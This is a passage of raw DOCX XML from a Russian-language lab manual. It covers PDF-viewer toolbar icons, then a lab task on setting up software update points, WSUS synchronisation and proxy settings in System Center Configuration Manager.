            <wp:extent cx="1022350" cy="288290"/>
            <wp:effectExtent l="19050" t="0" r="6350" b="0"/>
            <wp:docPr id="457" name="Рисунок 493" descr="работа с докумен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descr="работа с документом"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId347" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1022350" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Первая иконка с тремя буквами английского алфавита производит проверку орфографии в комментариях и полях форм. Тоесть сам документ она не проверяет. Ножницы– это аналог клавиатурному сокращению «Ctrl+X», тоесть вырезать. Работает с выделенными областями в документе. Сразу за ножницами идет иконка вставки, и это равно сокращению «Ctrl+V». Иконка фотоаппарата предоставляет сделать снимок (скриншот) той области которую вы укажете в документе после нажатия этой кнопки. Изображения сохранится в буфер обмена и вам, потом нужно будет, его вставить в любую программу обработки изображений и сохранить. Заметьте, даже если вы сделаете снимок текста, он будет переведен в изображение! Последней тут есть лупа. Это поиск по нашему документу. Нажимаем и в появившемся окошке вводим искомое слово или словосочетание.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="741680" cy="295275"/>
            <wp:effectExtent l="19050" t="0" r="1270" b="0"/>
            <wp:docPr id="458" name="Рисунок 494" descr="Выделение тек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descr="Выделение текста"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId348" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="741680" cy="295275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Комментарий – предоставляет возможность оставить в любом месте документа иконочку в виде комментария, в которой будут храниться внесенные раньше данные. Остаются при пересохранении документа. Вторая иконка – виделение текста. Нажимаете и выделяете нужное количество символов или абзацев на странице. Их потом можно скопировать и переместить в другое место. И третья иконка, которая в виде противоположных стрелочек, это разворот документа для удобного чтения. Уберает все панельки с навигацией и меню. Работает на клавише «F8».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc22642671"/>
      <w:bookmarkStart w:id="150" w:name="_Toc507788519"/>
      <w:bookmarkStart w:id="151" w:name="_Toc507788244"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 2 Выполнить настройку обновлений программ отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
      <w:bookmarkEnd w:id="151"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в System Center Configuration Manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перед отображением данных о соответствии обновлений программного обеспечения требованиям в консоли System Center Configuration Manager и перед развертыванием обновлений ПО на клиентских компьютерах необходимо выполнить следующие действия: установить и настроить точку обновления ПО, синхронизировать метаданные обновлений ПО и проверить связанные с ними параметры конфигурации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При наличии иерархии Configuration Manager сначала установите и настройте точку обновления ПО на сайте центра администрирования, а затем установите и настройте точки обновления на остальных сайтах. Некоторые параметры доступны только при настройке точки обновления ПО на сайте верхнего уровня, который является сайтом центра администрирования или автономным первичным сайтом. Имеются различные параметры конфигурации, которые необходимо учитывать в зависимости от того, где установлена точка обновления ПО. Используйте действия, перечисленные в следующей таблице, чтобы установить и настроить точку обновления ПО, синхронизировать обновления ПО и настроить параметры, связанные с обновлениями ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка обновлений ПО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используйте действия и процедуры, описанные в таблице 1, чтобы настроить обновления программного обеспечения в Configuration Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9564" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2817"/>
        <w:gridCol w:w="6747"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2817" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Шаг</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6747" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Подробные сведения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="281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Шаг 1. Установка и настройка точки обновления программного обеспечения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="674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rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">На сайте центра администрирования и на первичных сайтах должна иметься точка обновления ПО, позволяющая оценивать соответствие обновлений ПО требованиям и развертывать обновления ПО на клиентских устройствах. Точка обновления программного обеспечения является необязательной для вторичных сайтов. На сервере с установленными службами WSUS необходимо создать роль точки обновления ПО. Точка обновления ПО взаимодействует со службами WSUS для настройки параметров обновления и запроса синхронизации метаданных обновлений. При наличии иерархии Configuration Manager сначала установите и настройте точку обновления ПО на сайте центра администрирования, затем на дочерних первичных сайтах, а затем, если необходимо, на вторичных сайтах. При наличии </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>автономного первичного сайта, без сайта центра администрирования, сначала установите и настройте точку обновления ПО на первичном сайте, а затем, если необходимо, на вторичных сайтах. Некоторые параметры доступны только в случае настройки точки обновлений ПО на сайте верхнего уровня. Имеются различные параметры, которые необходимо учитывать в зависимости от того, где установлена точка обновления ПО.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="281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lastRenderedPageBreak/>
              <w:t>Шаг 2. Синхронизация обновлений программного обеспечения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="674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Выберите метод синхронизации в зависимости от подключения из точки обновления программного обеспечения к источнику обновления:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Синхронизация обновлений программного обеспечения из подключенной точки обновления программного обеспечения</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Синхронизация обновлений – это процесс получения метаданных обновлений в Центре обновления Майкрософт и репликации этих метаданных на все сайты, для которых включены обновления, в иерархии Configuration Manager . Точка обновления ПО на сайте центра администрирования или на автономном первичном сайте получает метаданные обновлений ПО в Центре обновления Майкрософт. Дочерние первичные сайты и вторичные сайты получают метаданные обновлений из точки обновления ПО, указанной в качестве восходящего источника обновления. Для успешной синхронизации обновлений ПО требуется доступ к вышестоящему источнику обновлений</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Синхронизация обновлений программного обеспечения из отсоединенной точки обновления программного обеспечения</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Автоматическая синхронизация обновлений ПО невозможна, если точка обновления ПО на сайте центра администрирования или на автономном первичном сайте отключена от Интернета. Чтобы получить последние обновления для отключенной точки обновления, нужно использовать средство WSUSUtil. Сначала нужно экспортировать метаданные обновлений и условия лицензий из источника обновлений, а затем импортировать эти метаданные и файлы на отключенную точку обновления.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="281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Шаг 3. Настройка классификаций и продуктов для синхронизации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="674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Данная конфигурация выполняется только на сайте центра администрирования или на автономном первичном сайте.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>После синхронизации обновлений без выбора классов и продуктов необходимо настроить классы и продукты на странице «Компонент точки обновления программного обеспечения». После настройки свойств повторите шаг 2, чтобы начать синхронизацию обновлений ПО и получить обновления, соответствующие настроенным условиям по классам и продуктам.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="281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Шаг 4. Проверка параметров клиентов и конфигураций групповой политики для обновлений программного обеспечения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="674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Существуют параметры клиентов Configuration Manager и конфигурации групповой политики, связанные с обновлениями ПО и которые необходимо проверить перед развертыванием обновлений ПО.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Важно! Перед установкой роли точки обновления ПО необходимо убедиться, что сервер соответствует необходимым требованиям, и определить инфраструктуру точки обновления на сайте. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Важно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>! Можно установить более одной точки обновления ПО на сайте. Первая устанавливаемая точка обновления ПО настраивается в качестве источника синхронизации, который синхронизирует обновления из Центра обновления Майкрософт или из вышестоящего источника синхронизации. Другие точки обновления ПО на сайте настраиваются в качестве реплик первой точки обновления ПО. Поэтому некоторые параметры недоступны после установки и настройки начальной точки обновления ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Можно добавить роль системы сайта «Точка обновления программного обеспечения» на существующий сервер системы сайта или создать новый. На странице Выбор системной роли мастера создания сервера системы сайта или мастера добавления ролей системы сайта , в зависимости от того, добавляется ли роль системы сайта на новый или существующий сервер сайта, выберите пункт Точка обновления программного обеспечения, а затем настройте параметры точки обновления ПО в мастере. Параметры различаются в зависимости от используемой версии Configuration Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В следующих разделах приведены сведения о параметрах точки обновления ПО на сайте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметры прокси-сервера. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры прокси-сервера можно настроить на разных страницах мастера создания сервера системы сайта или мастера добавления ролей системы сайта в зависимости от используемой версии Configuration Manager .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Необходимо настроить прокси-сервер, а затем указать, когда использовать прокси-сервер для обновлений ПО. Настройте следующие параметры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте параметры прокси-сервера на странице Прокси в мастере или на вкладке Прокси в свойствах системы сайта. Параметры прокси-сервера задаются для системы сайта, что означает использование заданных параметров прокси-сервера всеми ролями системы сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Укажите, необходимо ли использовать прокси-сервер, когда Configuration Manager синхронизирует обновления ПО и загружает содержимое с использованием правила автоматического развертывания. Настройте параметры прокси-сервера точки обновления программного обеспечения на странице Параметры учетной записи и прокси-сервера в мастере или на вкладке Параметры учетной записи и прокси-сервера в свойствах точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Параметр Использовать прокси-сервер при загрузке содерж. с помощью правил авторазвертывания доступен, но не используется для точки обновления ПО, расположенной на вторичном сайте. Только точка обновления ПО на сайте центра администрирования и на первичном сайте загружает содержимое со страницы Центра обновления Майкрософт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Важно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>! По умолчанию для подключения к Интернету и загрузки обновлений при запуске правил автоматического развертывания используется учетная запись Локальная система сервера, на котором было создано правило автоматического развертывания. Если эта учетная запись не имеет доступа к Интернету, скачивание обновлений программного обеспечения будет невозможно, а в файл журнала ruleengine.log будет внесена следующая запись: Не удалось скачать обновление из Интернета. Ошибка = 12007. Настройте учетные данные для подключения к прокси-серверу, если у учетной записи «Локальная система» нет доступа в Интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры WSUS.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Параметры WSUS необходимо настроить на разных страницах мастера создания сервера системы сайта или мастера добавления ролей системы сайта в зависимости от используемой версии Configuration Manager, а в некоторых случаях – только в свойствах точки обновления программного обеспечения (это окно также называется «Свойства компонента точки обновления программного обеспечения»). Следующие разделы содержат сведения о настройке параметров WSUS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры порта WSUS.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Необходимо настроить параметры порта WSUS на странице точки обновления ПО мастера или в свойствах точки обновления ПО. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Настройка соединения SSL для WSUS. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Соединение SSL можно настроить на странице Общие мастера или на вкладке Общие в свойствах точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Учетная запись соединения с сервером WSUS. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
